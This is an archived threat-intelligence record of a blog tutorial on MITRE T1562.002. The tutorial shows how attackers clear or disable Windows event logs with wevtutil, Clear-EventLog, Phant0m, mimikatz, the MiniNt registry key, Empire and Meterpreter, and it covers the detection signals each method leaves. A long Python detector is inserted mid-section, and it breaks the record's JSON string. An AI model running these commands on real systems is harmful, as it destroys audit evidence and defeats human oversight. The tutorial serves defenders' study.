{
	"id": "ef7f33e8-f0ff-4759-9186-f10b852083bd",
	"created_at": "2026-04-06T00:19:41.582311Z",
	"updated_at": "2026-04-10T13:11:31.510443Z",
	"deleted_at": null,
	"sha1_hash": "d768cc75e7be47a5aee298cecd4d4df0e6f4bba9",
	"title": "Defense Evasion: Windows Event Logging (T1562.002)",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 452337,
	"plain_text": "Defense Evasion: Windows Event Logging (T1562.002)\r\nBy raj\r\nPublished: 2021-04-22 · Archived: 2026-04-05 22:06:27 UTC\r\nIn this post, we explore the Windows Event Logging defense-evasion techniques attackers use to avoid detection. By disabling, bypassing, or tampering with the event logs using built-in tools and scripts, threat actors cover their tracks and stay hidden from security teams. Understanding these techniques helps defenders strengthen their monitoring and response.\r\nDefense Evasion is the ATT&CK tactic covering the techniques an attacker uses to avoid being detected during an intrusion.\r\nMITRE TACTIC: Defense Evasion (TA0005)\r\nMITRE TECHNIQUE: Impair Defenses (T1562)\r\nMITRE SUB-TECHNIQUE: Disable Windows Event Logging (T1562.002)\r\nTable of Contents\r\nClear Event log using Wevtutil Command\r\nClear Event log using Powershell\r\nPhantom\r\nMimikatz\r\nMiniNT registry key\r\nPowershell Empire\r\nMetasploit\r\nAn attacker disables or clears Windows event logging to reduce the data available for detection and audit. Logon attempts, process creation, and other user and system activity are all recorded in the Windows event logs, and analysts and detection tooling rely on those records to find attacker artifacts.\r\nClear Event log using Wevtutil Command\r\nwevtutil is a built-in command-line tool for querying event logs and publishers. It can also install and uninstall event manifests, and export, archive, and clear logs.\r\nRun the following from an elevated (administrator) prompt:\r\nwevtutil cl security\r\nThe Security log is now empty, but the clearing action itself is recorded: Windows writes Event ID 1102 (The audit log was cleared) to the Security log, naming the account that cleared it. Clearing the other logs (wevtutil cl system, wevtutil cl application) is recorded as Event ID 104 in the System log.\r\nClear Event log using Powershell\r\nAnother method is the Clear-EventLog cmdlet of Windows PowerShell 5.1 (the cmdlet is not included in PowerShell 7). The screenshot in the original post shows the machine with populated System and Security logs before the command is run.\r\nRun PowerShell as administrator and execute:\r\nClear-EventLog -LogName Security\r\nClear-EventLog -LogName System\r\nThe commands remove every entry from the Security and System logs. As with wevtutil, the clear is itself logged (1102 in Security, 104 in System).\r\nPhantom\r\nThis script walks the thread stacks of the Event Log service process (a specific svchost.exe), identifies the threads that belong to the Event Log service, and kills them. The system stops collecting logs while the Event Log service still appears to be running, so no 1102 or 104 is ever written. 
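The thread-killing approach just described and the clearing commands above each leave a different trace, and a defender needs more than one check to cover them. As an added example (not part of the original post and not code from any of the tools it names), the Python below is a small detector run over constructed event records, each flattened into one EventData dict: it flags Security 1102 and System 104 clear events, process-creation events (Security 4688 with command-line auditing enabled, or Sysmon Event ID 1) whose command line matches a tool on this page, Sysmon Event ID 12 creation of the MiniNt key, and, for the thread-kill case where nothing further is written, a host that goes silent for longer than a threshold. The sample events, the host name WS01, the user raj and the 30-minute gap threshold are assumptions made for the example.

```python
from datetime import datetime, timedelta

BS = chr(92)  # backslash, built with chr() so no escape sequences appear in this file

# Command-line fragments that map to the clearing/tampering tools covered on this page
CLEAR_CMDS = (
    'wevtutil cl ', 'wevtutil clear-log ',   # wevtutil cl security
    'clear-eventlog',                        # PowerShell Clear-EventLog
    'event::clear', 'event::drop',           # mimikatz event module
    'invoke-phant0m', 'invoke-phantom',      # Phant0m thread killer
    'control/minint',                        # reg add of the MiniNt key (separators unified below)
)


def normalize_cmd(cmd):
    '''Lower-case, drop .exe, unify path separators and collapse whitespace.'''
    cmd = cmd.lower().replace('.exe', '').replace(BS, '/')
    return ' '.join(cmd.split()) + ' '


def check_event(ev):
    '''Return a one-line finding for a single event record, or None if it is benign.'''
    ch, eid, prov = ev.get('Channel'), ev.get('EventID'), ev.get('Provider', '')
    data = ev.get('EventData', {})
    who = data.get('SubjectUserName', '?')
    # 1102 is the one record a Security-log clear cannot remove: it is written after the wipe
    if ch == 'Security' and eid == 1102:
        return 'Security log cleared by %s' % who
    # Clearing System/Application leaves a 104 in the System log that names the wiped channel
    if ch == 'System' and eid == 104 and prov == 'Microsoft-Windows-Eventlog':
        return '%s log cleared by %s' % (data.get('Channel', '?'), who)
    # Process creation: Security 4688 (needs command-line auditing) or Sysmon Event ID 1
    cmd = data.get('CommandLine', '')
    is_proc = (ch == 'Security' and eid == 4688) or (prov == 'Microsoft-Windows-Sysmon' and eid == 1)
    if is_proc and cmd:
        hits = [c for c in CLEAR_CMDS if c in normalize_cmd(cmd)]
        if hits:
            return 'log-tampering command (%s): %s' % (hits[0].strip(), cmd)
    # Sysmon Event ID 12 CreateKey on the MiniNt key (takes effect at the next reboot)
    if prov == 'Microsoft-Windows-Sysmon' and eid == 12 and data.get('EventType') == 'CreateKey':
        target = data.get('TargetObject', '').lower().replace(BS, '/')
        if target.endswith('/control/minint'):
            return 'MiniNt key created: %s' % data.get('TargetObject')
    return None


def scan(events):
    '''Run check_event over a stream; returns (TimeCreated, Computer, finding) tuples.'''
    out = []
    for ev in events:
        finding = check_event(ev)
        if finding:
            out.append((ev['TimeCreated'], ev['Computer'], finding))
    return out


def find_silent_gaps(events, max_gap=timedelta(minutes=30)):
    '''Phant0m kills the Event Log service threads but leaves the service looking
    healthy, so no 1102/104 is ever written. The remaining signal is that a normally
    chatty host goes quiet: flag per-host gaps between consecutive events above max_gap.'''
    by_host = {}
    for ev in events:
        by_host.setdefault(ev['Computer'], []).append(datetime.fromisoformat(ev['TimeCreated']))
    gaps = []
    for host, times in by_host.items():
        times.sort()
        for a, b in zip(times, times[1:]):
            if b - a > max_gap:
                gaps.append((host, a.isoformat(), b.isoformat()))
    return gaps


def _ev(t, channel, eid, provider, **data):
    # constructed record in the shape of an exported Windows/Sysmon event (host name is made up)
    return {'TimeCreated': t, 'Computer': 'WS01', 'Channel': channel,
            'EventID': eid, 'Provider': provider, 'EventData': data}


SEC = 'Microsoft-Windows-Security-Auditing'
EVTLOG = 'Microsoft-Windows-Eventlog'
SYSMON = 'Microsoft-Windows-Sysmon'
SYSMON_CH = 'Microsoft-Windows-Sysmon/Operational'
MININT_KEY = BS.join(['HKLM', 'SYSTEM', 'CurrentControlSet', 'Control', 'MiniNt'])

# Constructed sample stream for this example: timestamps, user and host are invented
SAMPLE_EVENTS = [
    _ev('2021-04-22T10:00:00', 'Security', 4688, SEC, SubjectUserName='raj',
        CommandLine='wevtutil.exe qe Security /c:5'),                     # benign query
    _ev('2021-04-22T10:01:00', 'Security', 4688, SEC, SubjectUserName='raj',
        CommandLine='WevtUtil.EXE  cl  Security'),                        # log clear
    _ev('2021-04-22T10:01:05', 'Security', 1102, EVTLOG, SubjectUserName='raj'),
    _ev('2021-04-22T10:02:00', 'System', 104, EVTLOG, SubjectUserName='raj', Channel='System'),
    _ev('2021-04-22T10:03:00', SYSMON_CH, 1, SYSMON,
        CommandLine='powershell -ep bypass Import-Module ./Invoke-Phant0m.ps1; Invoke-Phant0m'),
    _ev('2021-04-22T10:04:00', SYSMON_CH, 12, SYSMON, EventType='CreateKey', TargetObject=MININT_KEY),
    _ev('2021-04-22T10:05:00', SYSMON_CH, 1, SYSMON, CommandLine='notepad.exe notes.txt'),  # benign
    _ev('2021-04-22T12:40:00', 'System', 7036, 'Service Control Manager'),  # first event after silence
]

if __name__ == '__main__':
    for t, host, finding in scan(SAMPLE_EVENTS):
        print(t, host, finding)
    for host, a, b in find_silent_gaps(SAMPLE_EVENTS):
        print('no events from %s between %s and %s: Event Log service tampered?' % (host, a, b))
```

On the sample stream the scan reports five findings (the wevtutil clear, the 1102, the 104, the Phant0m command line and the MiniNt key) and ignores the benign wevtutil query and notepad, while the gap check reports the silence between 10:05 and 12:40. The gap threshold has to be tuned per host class: a domain controller is never quiet for 30 minutes, a laptop in a drawer is.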
Download the Invoke-Phant0m script and run:\r\npowershell -ep bypass\r\nImport-Module .\\Invoke-Phant0m.ps1\r\nInvoke-Phant0m\r\nMimikatz\r\nMimikatz needs no introduction in red teaming: besides stealing credentials, its event module can clear the logs shown in Event Viewer.\r\nRun mimikatz as administrator and execute:\r\nprivilege::debug\r\nevent::\r\nevent::clear\r\nevent:: on its own lists the commands of the module. event::clear clears the log through the normal API and, like the other clearing methods, leaves a 1102 behind; the same module's event::drop instead patches the Event Log service in memory so that it stops writing events at all.\r\nMiniNT registry key\r\nThe registry can be used as well: create the key below and reboot the machine so the change takes effect.\r\nreg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\MiniNt\"\r\nAfter the reboot this key disables the Event Log service: no new events are written, and Event Viewer can no longer open the logs. The key itself is easy to baseline or alert on (for example with a Sysmon registry CreateKey event).\r\nPowerShell Empire\r\nPowerShell Empire ships the Phant0m technique as a module, so it can likewise identify the Event Log service threads and kill them from an agent.\r\nUse the following commands from the menu of the agent in question:\r\nusemodule management/phant0m\r\nexecute\r\nMetasploit\r\nLast but not least, Metasploit can clear the Application, Security, and System logs from a Meterpreter session with a single command:\r\nclearev\r\nclearev uses the same clearing API as the tools above, so it also produces the 1102 and 104 clear events.\r\nDisabling Windows event logging is a common defense evasion technique. Defenders should treat Event IDs 1102 and 104, process creation with wevtutil cl or Clear-EventLog command lines, creation of the MiniNt key, and unexpected silence from an otherwise chatty host as signals worth alerting on.\r\nReference: https://svch0st.medium.com/event-log-tampering-part-1-disrupting-the-eventlog-service-8d4b7d67335c\r\nAuthor: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, and a social media and gadget enthusiast.\r\nSource: https://www.hackingarticles.in/defense-evasion-windows-event-logging-t1562-002/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.hackingarticles.in/defense-evasion-windows-event-logging-t1562-002/"
	],
	"report_names": [
		"defense-evasion-windows-event-logging-t1562-002"
	],
	"threat_actors": [
		{
			"id": "75108fc1-7f6a-450e-b024-10284f3f62bb",
			"created_at": "2024-11-01T02:00:52.756877Z",
			"updated_at": "2026-04-10T02:00:05.273746Z",
			"deleted_at": null,
			"main_name": "Play",
			"aliases": null,
			"source_name": "MITRE:Play",
			"tools": [
				"Nltest",
				"AdFind",
				"PsExec",
				"Wevtutil",
				"Cobalt Strike",
				"Playcrypt",
				"Mimikatz"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434781,
	"ts_updated_at": 1775826691,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/d768cc75e7be47a5aee298cecd4d4df0e6f4bba9.pdf",
		"text": "https://archive.orkl.eu/d768cc75e7be47a5aee298cecd4d4df0e6f4bba9.txt",
		"img": "https://archive.orkl.eu/d768cc75e7be47a5aee298cecd4d4df0e6f4bba9.jpg"
	}
}